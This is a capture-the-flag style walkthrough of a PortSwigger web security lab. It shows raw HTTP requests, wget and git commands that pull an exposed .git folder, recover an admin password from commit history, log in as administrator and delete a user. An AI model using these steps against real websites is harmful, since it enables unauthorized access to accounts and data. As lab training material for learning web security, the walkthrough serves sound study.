Port Swigger Information disclosure in version con
Information disclosure in version control history
Solution
Open file .git from: https://0a740031043ee10f8198d5e90096009f.web-security-academy.net/.git/
GET /.git HTTP/2
Host: 0a740031043ee10f8198d5e90096009f.web-security-academy.net
Cookie: session=RX3AmsdbkCncU00PwfmKo4iVEqDiYZWm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Get password for user
Password: 4zgddayamwqh2pks5vgd
---
Download .git folder from: https://0a740031043ee10f8198d5e90096009f.web-security-academy.net/.git/
┌──(kali㉿kali)-[~/Desktop/writeups/PortSwigger/Port_Swigger_Information disclosure in version control history]
└─$ wget -r https://0a740031043ee10f8198d5e90096009f.web-security-academy.net/.git/
--2025-12-19 15:47:04-- https://0a740031043ee10f8198d5e90096009f.web-security-academy.net/.git/
Resolving 0a740031043ee10f8198d5e90096009f.web-security-academy.net (0a740031043ee10f8198d5e90096009f.web-security-academy.net)... 79.125.84.16, 34.246.129.62
Connecting to 0a740031043ee10f8198d5e90096009f.web-security-academy.net (0a740031043ee10f8198d5e90096009f.web-security-academy.net)|79.125.84.16|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1201 (1.2K) [text/html]
Saving to: ‘0a740031043ee10f8198d5e90096009f.web-security-academy.net/.git/index.html’
0a740031043ee10f8198d5e900960 100%[==============================================>] 1.17K --.-KB/s in 0s
2025-12-19 15:47:05 (82.6 MB/s) - ‘0a740031043ee10f8198d5e90096009f.web-security-academy.net/.git/index.html’ saved [1201/1201]
___
Check last commit
┌──(kali㉿kali)-[~/…/PortSwigger/Port_Swigger_Information disclosure in version control history/0a740031043ee10f8198d5e90096009f.web-security-academy.net/.git]
└─$ git log
commit fdc8ee59074fa0acc398527eddec72e2e249057f (HEAD -> master)
Author: Carlos Montoya <[email protected]>
Date: Tue Jun 23 14:05:07 2020 +0000
Remove admin password from config
commit 906dbbaaf56a04231ddebff49ca7ba2086078101
Author: Carlos Montoya <[email protected]>
Date: Mon Jun 22 16:23:42 2020 +0000
Add skeleton admin panel
┌──(kali㉿kali)-[~/…/PortSwigger/Port_Swigger_Information disclosure in version control history/0a740031043ee10f8198d5e90096009f.web-security-academy.net/.git]
└─$ git show fdc8ee59074fa0acc398527eddec72e2e249057f
commit fdc8ee59074fa0acc398527eddec72e2e249057f (HEAD -> master)
Author: Carlos Montoya <[email protected]>
Date: Tue Jun 23 14:05:07 2020 +0000
Remove admin password from config
diff --git a/admin.conf b/admin.conf
index 8547116..21d23f1 100644
--- a/admin.conf
+++ b/admin.conf
@@ -1 +1 @@
-ADMIN_PASSWORD=4zgddayamwqh2pks5vgd
+ADMIN_PASSWORD=env('ADMIN_PASSWORD')
Login to website: administrator
L: administrator
P: 4zgddayamwqh2pks5vgd
---
POST /login HTTP/2
Host: 0a740031043ee10f8198d5e90096009f.web-security-academy.net
Cookie: session=zcokpGdwD6YrIEd9AOnVjhmqAG1JdOd0
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Origin: https://0a740031043ee10f8198d5e90096009f.web-security-academy.net
Referer: https://0a740031043ee10f8198d5e90096009f.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
csrf=BKBaDxFCoZo4cJyTAcNajjXRKcn8CD5M&username=administrator&password=4zgddayamwqh2pks5vgd
---
GET /my-account?id=administrator HTTP/2
Host: 0a740031043ee10f8198d5e90096009f.web-security-academy.net
Cookie: session=TdcL0sHwDdJ8G264nUc76HSQmaMr7E4w
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a740031043ee10f8198d5e90096009f.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
GET /admin HTTP/2
Host: 0a740031043ee10f8198d5e90096009f.web-security-academy.net
Cookie: session=TdcL0sHwDdJ8G264nUc76HSQmaMr7E4w
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a740031043ee10f8198d5e90096009f.web-security-academy.net/my-account?id=administrator
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Delete user: carlos
GET /admin/delete?username=carlos HTTP/2
Host: 0a740031043ee10f8198d5e90096009f.web-security-academy.net
Cookie: session=TdcL0sHwDdJ8G264nUc76HSQmaMr7E4w
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a740031043ee10f8198d5e90096009f.web-security-academy.net/admin
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Solved